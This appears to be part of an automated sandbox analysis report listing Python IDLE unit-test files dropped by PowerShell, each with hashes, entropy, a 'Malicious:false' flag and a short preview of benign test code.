                              Preview:"Test autoexpand, coverage 100%."....from idlelib.autoexpand import AutoExpand..import unittest..from test.support import requires..from tkinter import Text, Tk......class DummyEditwin:.. # AutoExpand.__init__ only needs .text.. def __init__(self, text):.. self.text = text....class AutoExpandTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.tk = Tk().. cls.text = Text(cls.tk).. cls.auto_expand = AutoExpand(DummyEditwin(cls.text)).. cls.auto_expand.bell = lambda: None....# If mock_tk.Text._decode understood indexes 'insert' with suffixed 'linestart',..# 'wordstart', and 'lineend', used by autoexpand, we could use the following..# to run these test on non-gui machines (but check bell)...## try:..## requires('gui')..## #raise ResourceDenied() # Uncomment to test mock...## except ResourceDenied:..## from idlelib.idle_test.mock_tk import Text..##
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8677
                              Entropy (8bit):4.706041847697795
                              Encrypted:false
                              SSDEEP:96:PQrKRCXro6fpnwqdnyqd41jW95tefCf30MmCqzUNqRrCwRwww4vM9TTSkk:SJwqdnyqn95REMmCFNqRWwRwwwhTekk
                              MD5:DCD308D3488E29A4F86533FF766A8FC7
                              SHA1:983777728ECB92D32D05C6CB14D0E3148FEDDD13
                              SHA-256:532A269A58E66953BF6F9CB8EB36825B9FC58396C88B6CE9C08AF0AE875D75B2
                              SHA-512:A6EFCCE0085BE3681CAF49E7B6954826A82AFE61CB9233E3A6496988CFB8119C8FAE49B2567EF73671E3FAB21B3BE3018B0D5B40FE538C3B91A7963FF5ACED95
                              Malicious:false
                              Preview:"Test browser, coverage 90%."....from idlelib import browser..from test.support import requires..import unittest..from unittest import mock..from idlelib.idle_test.mock_idle import Func..from idlelib.util import py_extensions....from collections import deque..import os.path..import pyclbr..from tkinter import Tk....from idlelib.tree import TreeNode......class ModuleBrowserTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().. cls.mb = browser.ModuleBrowser(cls.root, __file__, _utest=True).... @classmethod.. def tearDownClass(cls):.. cls.mb.close().. cls.root.update_idletasks().. cls.root.destroy().. del cls.root, cls.mb.... def test_init(self):.. mb = self.mb.. eq = self.assertEqual.. eq(mb.path, __file__).. eq(pyclbr._modules, {}).. self.assertIsInstance(mb.node, TreeNode).. self.assertIsNotNone(browser.f
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):14030
                              Entropy (8bit):4.6312189992284205
                              Encrypted:false
                              SSDEEP:192:u5fYa1LgnIwpqg/blge4KsoCXVtQn8mfKMWGs8vPktxp18bL8qk:ulYa1LgIwpqeblgNXFmyB8vM
                              MD5:1DC5A1B24DC1EB54C6179B5B08056310
                              SHA1:1656017EBB33346D1DC141D6BE1EC000575CFDE8
                              SHA-256:218FCEBFC3653927F3824CB722ED04A004D9FE5809C5EF68B9F219A6B102D2E8
                              SHA-512:88C731B49AC9AF01A2C42AC520D5A1CA2C70933D663CB756359F79BCF6AB7AC7A46A6CE7C1E1D63870D833F1453E0FC7B15462184B8D43644ADB1CF7BA80B863
                              Malicious:false
                              Preview:"Test calltip, coverage 76%"....from idlelib import calltip..import unittest..from unittest.mock import Mock..import textwrap..import types..import re..from idlelib.idle_test.mock_tk import Text..from test.support import MISSING_C_DOCSTRINGS......# Test Class TC is used in multiple get_argspec test methods..class TC:.. 'doc'.. tip = "(ai=None, *b)".. def __init__(self, ai=None, *b): 'doc'.. __init__.tip = "(self, ai=None, *b)".. def t1(self): 'doc'.. t1.tip = "(self)".. def t2(self, ai, b=None): 'doc'.. t2.tip = "(self, ai, b=None)".. def t3(self, ai, *args): 'doc'.. t3.tip = "(self, ai, *args)".. def t4(self, *args): 'doc'.. t4.tip = "(self, *args)".. def t5(self, ai, b=None, *args, **kw): 'doc'.. t5.tip = "(self, ai, b=None, *args, **kw)".. def t6(no, self): 'doc'.. t6.tip = "(no, self)".. def __call__(self, ci): 'doc'.. __call__.tip = "(self, ci)".. def nd(self): pass # No doc... # attaching .tip to wrapped methods does no
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):715
                              Entropy (8bit):4.618707633909012
                              Encrypted:false
                              SSDEEP:12:whTVo0RpHoRjrGNJtpqj7zbYWGXP4XjrRVHGX6Jl2aLJv:w/o0rIqu7znoyHRVmXYUal
                              MD5:5E7A281BA1F806210C3A4FE6C467C2C2
                              SHA1:F762DCDC2CBCECE2608E56198167C862AA72C8B6
                              SHA-256:F3BDC45A886D5805FC30BCCA5BF893344C215F57F285FD7AB834DA3EA3A0876F
                              SHA-512:80CDE7C60AB6868EE94D2AF995FC2C0C785AEC8966F955C98E71201CAF21FE164EBCA5751ECCF1FBD9B97A17A6BEE091436A9F1E06F37FE52E3EE51D4B83B469
                              Malicious:false
                              Preview:"Test calltip_w, coverage 18%."....from idlelib import calltip_w..import unittest..from test.support import requires..from tkinter import Tk, Text......class CallTipWindowTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().. cls.text = Text(cls.root).. cls.calltip = calltip_w.CalltipWindow(cls.text).... @classmethod.. def tearDownClass(cls):.. cls.root.update_idletasks().. cls.root.destroy().. del cls.text, cls.root.... def test_init(self):.. self.assertEqual(self.calltip.anchor_widget, self.text)....if __name__ == '__main__':.. unittest.main(verbosity=2)..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):16537
                              Entropy (8bit):4.457889552494573
                              Encrypted:false
                              SSDEEP:192:gZgsVWxgZbCFsFv7sCN37jmgGfbTFqYZGUhnt59SYQKA1NpTRaz2vwTjwk:gqDgcCJMgGfswYYQ7DpThvwTjb
                              MD5:DF16484271033DC093F9C553B0578A7D
                              SHA1:6F6F223AF5695730720DC959C6D98DA43B574EF7
                              SHA-256:E5D19B6CA7F2E86499F8FE61A99049C9E4A7484E6808D68D32AAD0DD58973B5A
                              SHA-512:DB38989A8DF98E1225A2C67B879505DEDF0718EAF6F1E2B9E6E36183EA6ADD0FA3A4F403BE6D8AADD7DE78E30803B87D16401FFE2E7EAD510FB9BE8ED060EF7A
                              Malicious:false
                              Preview:"Test codecontext, coverage 100%"....from idlelib import codecontext..import unittest..import unittest.mock..from test.support import requires..from tkinter import NSEW, Tk, Frame, Text, TclError....from unittest import mock..import re..from idlelib import config......usercfg = codecontext.idleConf.userCfg..testcfg = {.. 'main': config.IdleUserConfParser(''),.. 'highlight': config.IdleUserConfParser(''),.. 'keys': config.IdleUserConfParser(''),.. 'extensions': config.IdleUserConfParser(''),..}..code_sample = """\....class C1:.. # Class comment... def __init__(self, a, b):.. self.a = a.. self.b = b.. def compare(self):.. if a > b:.. return a.. elif a < b:.. return b.. else:.. return None.."""......class DummyEditwin:.. def __init__(self, root, frame, text):.. self.root = root.. self.top = root.. self.text_frame = frame.. self.text = text.. self.label = ''....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):23504
                              Entropy (8bit):4.757245506946897
                              Encrypted:false
                              SSDEEP:384:qYqm5sI4teTvtWxjz2Y2dSZzMqUN9Mc/vxdgd0uQGxwFtp5P16dHR/shjzBmy:qYqm5sPz2Y2PV3xdgd0yxitpZkdHR/sz
                              MD5:81F4BE0F48107993E664E8B76776D07A
                              SHA1:287A5BD3DA51751A21B6E132F29EEA17FAF2703B
                              SHA-256:C3A3791C536A3C5DCA2F8274BA9BA38834F76D98CC6CCE15758684ED881449EB
                              SHA-512:1F267EDD70B8DCF55986B0916028A367B2001E551C74835E8F1E5E1A366ECAD888FB296D8B7C4235B1998026888ED24F9CC9D55D44126FD7ED1CA187881865EA
                              Malicious:false
                              Preview:"Test colorizer, coverage 99%."..from idlelib import colorizer..from test.support import requires..import unittest..from unittest import mock..from idlelib.idle_test.tkinter_testing_utils import run_in_tk_mainloop....from functools import partial..import textwrap..from tkinter import Tk, Text..from idlelib import config..from idlelib.percolator import Percolator......usercfg = colorizer.idleConf.userCfg..testcfg = {.. 'main': config.IdleUserConfParser(''),.. 'highlight': config.IdleUserConfParser(''),.. 'keys': config.IdleUserConfParser(''),.. 'extensions': config.IdleUserConfParser(''),..}....source = textwrap.dedent("""\.. if True: int ('1') # keyword, builtin, string, comment.. elif False: print(0) # 'string' in comment.. else: float(None) # if in comment.. if iF + If + IF: 'keyword matching must respect case'.. if'': x or'' # valid keyword-string no-space combinations.. async def f(): await g().. # Strings should be entirely colored, including qu
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):32896
                              Entropy (8bit):4.800212728354879
                              Encrypted:false
                              SSDEEP:384:YH3K5ElLEHsghVADLyk7KvJeh9VzFBznFuIX5RMhi:YH65ElLAsgL5k7ieh9VvRpQi
                              MD5:CB0DAA6A3AF3C9A62E60D32B556D15CB
                              SHA1:C3D97C88A0166DB74579EB08C0D1A28769CE56A2
                              SHA-256:018719324D4E7FFC4C495875FE0F5A2C4368E1464F73DB38DDCE262702101B88
                              SHA-512:7FF9CD2533872802A488C157EBDE3C6E7AAE9CA928CCC466780F489C0A7CE23BA6AF54D8649BB0610A6F5F62A16457881F17FBAA29BBD06033E1DA0E66F4F7D1
                              Malicious:false
                              Preview:"""Test config, coverage 93%...(100% for IdleConfParser, IdleUserConfParser*, ConfigChanges)...* Exception is OSError clause in Save method...Much of IdleConf is also exercised by ConfigDialog and test_configdialog..."""..from idlelib import config..import sys..import os..import tempfile..from test.support import captured_stderr, findfile..import unittest..from unittest import mock..import idlelib..from idlelib.idle_test.mock_idle import Func....# Tests should not depend on fortuitous user configurations...# They must not affect actual user .cfg files...# Replace user parsers with empty parsers that cannot be saved..# due to getting '' as the filename when created.....idleConf = config.idleConf..usercfg = idleConf.userCfg..testcfg = {}..usermain = testcfg['main'] = config.IdleUserConfParser('')..userhigh = testcfg['highlight'] = config.IdleUserConfParser('')..userkeys = testcfg['keys'] = config.IdleUserConfParser('')..userextn = testcfg['extensions'] = config.IdleUserConfParser('')....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):11818
                              Entropy (8bit):4.660729814625733
                              Encrypted:false
                              SSDEEP:192:j9acwx+8bscifEqaGfm/tkC/dwhFL+eFsS/3FeYDtxG4uJQqFZ2/J2NGns/JRJy8:j8cw/bscifEqaGfm/tkC/dwhFL+eFsS+
                              MD5:95E61B066AF42B76A9C256DDFB0A4798
                              SHA1:CBC1B5BA7CC714DD4390FEA80E2F1F770F1F84A2
                              SHA-256:F99447B4386E957DB35DF678EE8601FD77F36FC8883BC5D983D062130EE48E5B
                              SHA-512:A4A9752C576B82B07D5628F77FC9B5A412EF2058E9C1915B2A1595AF7DB509D5CED0BFBF2101172C9C97F37E2FF1ED2945607E884AAF32F7DD5D9ABB78C049E5
                              Malicious:false
                              Preview:"""Test config_key, coverage 98%.....Coverage is effectively 100%. Tkinter dialog is mocked, Mac-only line..may be skipped, and dummy function in bind test should not be called...Not tested: exit with 'self.advanced or self.keys_ok(keys) ...' False..."""....from idlelib import config_key..from test.support import requires..import unittest..from unittest import mock..from tkinter import Tk, TclError..from idlelib.idle_test.mock_idle import Func..from idlelib.idle_test.mock_tk import Mbox_func......class ValidationTest(unittest.TestCase):.. "Test validation methods: ok, keys_ok, bind_ok.".... class Validator(config_key.GetKeysFrame):.. def __init__(self, *args, **kwargs):.. super().__init__(*args, **kwargs).. class list_keys_final:.. get = Func().. self.list_keys_final = list_keys_final.. get_modifiers = Func().. showerror = Mbox_func().... @classmethod.. def setUpClass(cls):.. requires('gui')..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):56969
                              Entropy (8bit):4.67011534981479
                              Encrypted:false
                              SSDEEP:1536:XTVftAv/Q0ONdC35reQOuabfjb+0Ds7LkjsQptUtMHcuVL6s5eQqQXpkBAJt8n59:dt8/Q00terUU
                              MD5:663293BCC230E11A3595EA0A9FEE9FF6
                              SHA1:EE63C1063F80AA9441B350451E81D2C72CC0A545
                              SHA-256:0AE312BCC28B0021BA498E70B9A5C29AABA5CB71B91E84DDF9E8B5A5AB312A08
                              SHA-512:163484FB3A34FF5504C5E95D449F86D90731EACFE948D1D343FA4250B6BBA11ADA8B84C3D82A350E819855DC6A657DCE70AFE456BDCC45DF14092CCF1016EB87
                              Malicious:false
                              Preview:"""Test configdialog, coverage 94%.....Half the class creates dialog, half works with user customizations..."""..from idlelib import configdialog..from test.support import requires..requires('gui')..import unittest..from unittest import mock..from idlelib.idle_test.mock_idle import Func..from tkinter import (Tk, StringVar, IntVar, BooleanVar, DISABLED, NORMAL)..from idlelib import config..from idlelib.configdialog import idleConf, changes, tracers....# Tests should not depend on fortuitous user configurations...# They must not affect actual user .cfg files...# Use solution from test_config: empty parsers with no filename...usercfg = idleConf.userCfg..testcfg = {.. 'main': config.IdleUserConfParser(''),.. 'highlight': config.IdleUserConfParser(''),.. 'keys': config.IdleUserConfParser(''),.. 'extensions': config.IdleUserConfParser(''),..}....root = None..dialog = None..mainpage = changes['main']..highpage = changes['highlight']..keyspage = changes['keys']..extpage = changes['
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):10024
                              Entropy (8bit):4.638324562380663
                              Encrypted:false
                              SSDEEP:192:3YsZgNMGYT2BIwUlKKdfxpqntFSOHZHGqVxn6Nz8+Wzk4MjJDcGTTtE1k:3YsqNMGYT0UKtFSOHZHGqVF6C1zk4MFZ
                              MD5:F4A34BE21BFDBA84ABECC779C2227F04
                              SHA1:CA4AE4DDC636C6CD119012CE141C8877A108BCD9
                              SHA-256:AAD9503D32EB437E0DECDE979CA01730B441E5692691F3E25D5DD2D6DE110659
                              SHA-512:CE55918B2D3198D4BFAD1B0A900702D372D6889471D8C72E471750F1916CAA3C9A9AF490FEBB14144302BD208633B1C96B02C9FA2B527A98C4F0BEAFCF4A33AE
                              Malicious:false
                              Preview:"""Test debugger, coverage 66%....Try to make tests pass with draft bdbx, which may replace bdb in 3.13+..."""....from idlelib import debugger..from collections import namedtuple..from textwrap import dedent..from tkinter import Tk....from test.support import requires..import unittest..from unittest import mock..from unittest.mock import Mock, patch...."""A test python script for the debug tests."""..TEST_CODE = dedent(""".. i = 1.. i += 2.. if i == 3:.. print(i).. """)......class MockFrame:.. "Minimal mock frame.".... def __init__(self, code, lineno):.. self.f_code = code.. self.f_lineno = lineno......class IdbTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. cls.gui = Mock().. cls.idb = debugger.Idb(cls.gui).... # Create test and code objects to simulate a debug session... code_obj = compile(TEST_CODE, 'idlelib/file.py', mode='exec').. frame1 = MockFrame(code_obj, 1).. frame1.f_back
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1001
                              Entropy (8bit):4.829180974277778
                              Encrypted:false
                              SSDEEP:24:buQMUh+SNrxFk5hCDineFNYFML9crQL9ral:buQMA+SpxFkKDineF+F2hral
                              MD5:E6B0DE5BAAA60FE0B0A476241E71072B
                              SHA1:335309BEC933E70D338262AEBDAA0F661CC25BB5
                              SHA-256:0EB3B8E1D20E47F63ED327AEEEDA491D2FFB41777A9108FEEE158AA445790A5F
                              SHA-512:00AEF2423DCAB1BBDCFC469DDB5663FE83324C8FB2FD6D4DA467514361CEE6767CAA6C8F67D7691ADCF225C2E946320B806CD5B054C3C7963DCF7032E4CF0235
                              Malicious:false
                              Preview:"Test debugger_r, coverage 30%."....from idlelib import debugger_r..import unittest....# Boilerplate likely to be needed for future test classes...##from test.support import requires..##from tkinter import Tk..##class Test(unittest.TestCase):..## @classmethod..## def setUpClass(cls):..## requires('gui')..## cls.root = Tk()..## @classmethod..## def tearDownClass(cls):..## cls.root.destroy()....# GUIProxy, IdbAdapter, FrameProxy, CodeProxy, DictProxy,..# GUIAdapter, IdbProxy, and 7 functions still need tests.....class IdbAdapterTest(unittest.TestCase):.... def test_dict_item_noattr(self): # Issue 33065..... class BinData:.. def __repr__(self):.. return self.length.... debugger_r.dicttable[0] = {'BinData': BinData()}.. idb = debugger_r.IdbAdapter(None).. self.assertTrue(idb.dict_item(0, 'BinData')).. debugger_r.dicttable.clear()......if __name__ == '__main__':.. unittest.main(verbosity=2).
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1668
                              Entropy (8bit):4.746775131615608
                              Encrypted:false
                              SSDEEP:12:bubhTquItgn/EUTjCZGymKA1Klqhnpr346mKAE46lqepr3KAhjepO5ChnpWYcjJu:bubMQ/Nhy/lUpbPvCY8pW7wpWk4al
                              MD5:6D3E4601B043C94FA7AC1A3462C39095
                              SHA1:1714A4FD9301233E57A37E11D81A52A43980DADB
                              SHA-256:A3A5CEEC69CE1794649B088AC861183B8ADC4C91881B29FBB221CEA1089B71CA
                              SHA-512:6390DBCFEB0F3D8D5FA2E9170D51C4EF2132FB55EDBAF65D3D6A29CC7EEA0C6713D134441BDC66EE8A59BDA56EF01A22F5AF291539961B265BA287CB6387DA96
                              Malicious:false
                              Preview:"Test debugobj, coverage 40%."....from idlelib import debugobj..import unittest......class ObjectTreeItemTest(unittest.TestCase):.... def test_init(self):.. ti = debugobj.ObjectTreeItem('label', 22).. self.assertEqual(ti.labeltext, 'label').. self.assertEqual(ti.object, 22).. self.assertEqual(ti.setfunction, None)......class ClassTreeItemTest(unittest.TestCase):.... def test_isexpandable(self):.. ti = debugobj.ClassTreeItem('label', 0).. self.assertTrue(ti.IsExpandable())......class AtomicObjectTreeItemTest(unittest.TestCase):.... def test_isexpandable(self):.. ti = debugobj.AtomicObjectTreeItem('label', 0).. self.assertFalse(ti.IsExpandable())......class SequenceTreeItemTest(unittest.TestCase):.... def test_isexpandable(self):.. ti = debugobj.SequenceTreeItem('label', ()).. self.assertFalse(ti.IsExpandable()).. ti = debugobj.SequenceTreeItem('label', (1,)).. self.assertTrue(ti.IsExpandable(
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):567
                              Entropy (8bit):4.794565771192221
                              Encrypted:false
                              SSDEEP:12:buF7GJvShTqFAqyJBVeyiO9BhBFnIVmkSpf6BHevy02aLJv:buBgvSMJw6wBhbQ/eoal
                              MD5:E95B514D3E356580A9DED30409B9DF72
                              SHA1:0060FA6A750D9220EA3BA8A6ADFCC8EB6AE39622
                              SHA-256:264859E8DEFF2F9CF3F81045142A09D3BF925F350DD48DB5BA69368FAF2F29F3
                              SHA-512:72D6EB5977125A88BC04E8D4E5070D028002E2FAD16F64324EDF4E6AF5296701A1395F4EE48D5B00B72AA3A77C143D6E61A14689A5EB8AC2DAF5A83D03031E26
                              Malicious:false
                              Preview:"Test debugobj_r, coverage 56%."....from idlelib import debugobj_r..import unittest......class WrappedObjectTreeItemTest(unittest.TestCase):.... def test_getattr(self):.. ti = debugobj_r.WrappedObjectTreeItem(list).. self.assertEqual(ti.append, list.append)....class StubObjectTreeItemTest(unittest.TestCase):.... def test_init(self):.. ti = debugobj_r.StubObjectTreeItem('socket', 1111).. self.assertEqual(ti.sockio, 'socket').. self.assertEqual(ti.oid, 1111)......if __name__ == '__main__':.. unittest.main(verbosity=2)..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1611
                              Entropy (8bit):4.558968618831017
                              Encrypted:false
                              SSDEEP:48:bwjHRXi4D53ae2WXVRtORONMlPqZ1OajZXRai:c7E4D5NvRER2i6Rjrf
                              MD5:1A0F7B379699E69B58D8DFD066D6F20C
                              SHA1:D3F9FAC02FFCD5900EE2F832C0A97B1409932102
                              SHA-256:2ACBE98D9DB036BAA7DCD46AC24B5832CF6B716C588C267365558BADA2166387
                              SHA-512:47F84F0AF947D8E05932C5FD293ADD0F3B88EFD10E722BCF10380F84626DFE7717DEC24F0BA6D8A590CDE9F64A517BC8165BF328EF60D0ECD4B4B78E774164D8
                              Malicious:false
                              Preview:"Test delegator, coverage 100%."....from idlelib.delegator import Delegator..import unittest......class DelegatorTest(unittest.TestCase):.... def test_mydel(self):.. # Test a simple use scenario..... # Initialize an int delegator... mydel = Delegator(int).. self.assertIs(mydel.delegate, int).. self.assertEqual(mydel._Delegator__cache, set()).. # Trying to access a non-attribute of int fails... self.assertRaises(AttributeError, mydel.__getattr__, 'xyz').... # Add real int attribute 'bit_length' by accessing it... bl = mydel.bit_length.. self.assertIs(bl, int.bit_length).. self.assertIs(mydel.__dict__['bit_length'], int.bit_length).. self.assertEqual(mydel._Delegator__cache, {'bit_length'}).... # Add attribute 'numerator'... mydel.numerator.. self.assertEqual(mydel._Delegator__cache, {'bit_length', 'numerator'}).... # Delete 'numerator'... del mydel.numerator..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2638
                              Entropy (8bit):4.38825059079587
                              Encrypted:false
                              SSDEEP:24:sFbnrbj960NEjItz/KpIynMXlzRVmCh3Spsro8EHH3T1esSqX84KK41es0pAzal:sFTrf9pNEjk/KpjeT3BKhdSA8HKWNfal
                              MD5:75AFF43E9E27B04038969E0FEB810E38
                              SHA1:11208F7E174D740012674DFD8DCD60548EAF5C62
                              SHA-256:93F790D07D34F2C80378D37BEED57FA25BB250F5812B497D34E788105EDC57AA
                              SHA-512:622D34268F39700D444EAB4FF3CA7426996D62443CFA7E8626309B73BC52EC9F9BBD73DB5BF9EA068923C617D9EF0BEA99CF300E3210C85B62971002EA2013FA
                              Malicious:false
                              Preview:'''Test (selected) IDLE Edit menu items.....Edit modules have their own test files..'''..from test.support import requires..requires('gui')..import tkinter as tk..from tkinter import ttk..import unittest..from idlelib import pyshell....class PasteTest(unittest.TestCase):.. '''Test pasting into widgets that allow pasting..... On X11, replacing selections requires tk fix... '''.. @classmethod.. def setUpClass(cls):.. cls.root = root = tk.Tk().. cls.root.withdraw().. pyshell.fix_x11_paste(root).. cls.text = tk.Text(root).. cls.entry = tk.Entry(root).. cls.tentry = ttk.Entry(root).. cls.spin = tk.Spinbox(root).. root.clipboard_clear().. root.clipboard_append('two').... @classmethod.. def tearDownClass(cls):.. del cls.text, cls.entry, cls.tentry.. cls.root.clipboard_clear().. cls.root.update_idletasks().. cls.root.destroy().. del cls.root.... def test_paste_text(self):..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8392
                              Entropy (8bit):4.081502616156668
                              Encrypted:false
                              SSDEEP:96:zJFDrIHffnxR+wL6hNM6oJ3bSKwxCYTsJmFDCkmcFcCkm9M9MSij2fO2NcvIEIcs:tl2ffxBci7FGxQiGcFyYCNcpSx9ak
                              MD5:8F93FDCC0A24FE209828CEC159C0813A
                              SHA1:CF684F3240492C8F694287AB6FE310C7280ADAE5
                              SHA-256:FACC3C65F65E56D35F261A6829E525A52AED087047987F4755090A0A110A603B
                              SHA-512:FEAB18C7AB8AFF7B0AACD893C427BA41555CB2DB55AEAD375834F363CB53A762F45A5FB666822B39D2C569263D3A41736814346B9F1432894C33DF10C72F153D
                              Malicious:false
                              Preview:"Test editor, coverage 53%."....from idlelib import editor..import unittest..from collections import namedtuple..from test.support import requires..from tkinter import Tk, Text....Editor = editor.EditorWindow......class EditorWindowTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().... @classmethod.. def tearDownClass(cls):.. cls.root.update_idletasks().. for id in cls.root.tk.call('after', 'info'):.. cls.root.after_cancel(id).. cls.root.destroy().. del cls.root.... def test_init(self):.. e = Editor(root=self.root).. self.assertEqual(e.root, self.root).. e._close()......class GetLineIndentTest(unittest.TestCase):.. def test_empty_lines(self):.. for tabwidth in [1, 2, 4, 6, 8]:.. for line in ['', '\n']:.. with self.subTest(line=line, tabwidth=tabwidth):.. self.assertE
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):828
                              Entropy (8bit):4.516635460102882
                              Encrypted:false
                              SSDEEP:12:OhT6TRpHoRjrzNpqj7ze4XjrRkea2NZH51HGlDYj9jxbcMNbRLoDZ02aLJv:OurI07zlHRg2f51mn++jal
                              MD5:91C65697FD96A05EAC03EB1F52E1D0D2
                              SHA1:800A0F93EDB98C55265D435F6BF02CF850C98B56
                              SHA-256:9E8240FD5B08F2CF3D5DC16E39AC19F23737FB401CCB461FBBCC99BF0F481BEB
                              SHA-512:06D48052CEFC3446FACCE5961EEF77783778A4D01917FD320035C7C997B04D646272600C0A9DEE0C1121E6EE5449A00880F5F97CFA53711AC126B233A99DAD29
                              Malicious:false
                              Preview:"Test filelist, coverage 19%."....from idlelib import filelist..import unittest..from test.support import requires..from tkinter import Tk....class FileListTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().... @classmethod.. def tearDownClass(cls):.. cls.root.update_idletasks().. for id in cls.root.tk.call('after', 'info'):.. cls.root.after_cancel(id).. cls.root.destroy().. del cls.root.... def test_new_empty(self):.. flist = filelist.FileList(self.root).. self.assertEqual(flist.root, self.root).. e = flist.new().. self.assertEqual(type(e), flist.EditorWindow).. e._close()......if __name__ == '__main__':.. unittest.main(verbosity=2)..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):24278
                              Entropy (8bit):4.588852559744101
                              Encrypted:false
                              SSDEEP:384:JH243Wuosx7j9ujP74hOsSrRqT3TSKNTjHq2IdFuMRp43jrV4:JH2UWrsx7Zuo0B4DSKBjHOdFuMRp43j2
                              MD5:4E36B5972CCD0230BD4287E81C933DBB
                              SHA1:5CA83469BF4CED4769348331D1F5546D2E6BC623
                              SHA-256:80A2E9DFC0E7CB896B1E9BD61ABE68C6B15F74C7349E393C3AA1EB05A363651F
                              SHA-512:6ABA699EAF3A59DE25EF333573BB9DF0B38886714F57F331266BE01F17A6CC2C6345C7D4BFA312B3FC5A20D05CC73A5CCDD8AC1BEAF13ED28A91785C59E8CE74
                              Malicious:false
                              Preview:"Test format, coverage 99%."....from idlelib import format as ft..import unittest..from unittest import mock..from test.support import requires..from tkinter import Tk, Text..from idlelib.editor import EditorWindow..from idlelib.idle_test.mock_idle import Editor as MockEditor......class Is_Get_Test(unittest.TestCase):.. """Test the is_ and get_ functions""".. test_comment = '# This is a comment'.. test_nocomment = 'This is not a comment'.. trailingws_comment = '# This is a comment '.. leadingws_comment = ' # This is a comment'.. leadingws_nocomment = ' This is not a comment'.... def test_is_all_white(self):.. self.assertTrue(ft.is_all_white('')).. self.assertTrue(ft.is_all_white('\t\n\r\f\v')).. self.assertFalse(ft.is_all_white(self.test_comment)).... def test_get_indent(self):.. Equal = self.assertEqual.. Equal(ft.get_indent(self.test_comment), '').. Equal(ft.get_indent(self.trailingws_comment), '').. Equ
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5228
                              Entropy (8bit):4.591850080243058
                              Encrypted:false
                              SSDEEP:96:5W7MrCo7i8crctdMJqlYiqsLBs+cqhjtdcQBtuZsnJk/k:tv7i8creisBvPhhdcQBgsnwk
                              MD5:A1EC3E90E28CBABED4D204A75D9C8ABA
                              SHA1:42C4CDD9BCFF7AED65C58317FEC121DE465F7D57
                              SHA-256:18441B4F0F2095FBA843EEC48293D5ADC8D62F30A6BE843D1B37F784070ACCC0
                              SHA-512:B04583FE4BEFD843C7C1EE51D2E0E1AC953FA7D06B51CC632EA0BC77E5C8897BFDFF82F02B6C8E54F0C39CD243F4676BC852FCE94C7C65FBB187325B9FBE5BBB
                              Malicious:false
                              Preview:""" !Changing this line will break Test_findfile.test_found!..Non-gui unit tests for grep.GrepDialog methods...dummy_command calls grep_it calls findfiles...An exception raised in one method will fail callers...Otherwise, tests are mostly independent...Currently only test grep_it, coverage 51%..."""..from idlelib import grep..import unittest..from test.support import captured_stdout..from idlelib.idle_test.mock_tk import Var..import os..import re......class Dummy_searchengine:.. '''GrepDialog.__init__ calls parent SearchDiabolBase which attaches the.. passed in SearchEngine instance as attribute 'engine'. Only a few of the.. many possible self.engine.x attributes are needed here... '''.. def getpat(self):.. return self._pat....searchengine = Dummy_searchengine()......class Dummy_grep:.. # Methods tested.. #default_command = GrepDialog.default_command.. grep_it = grep.GrepDialog.grep_it.. # Other stuff needed.. recvar = Var(False).. engine = searc
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
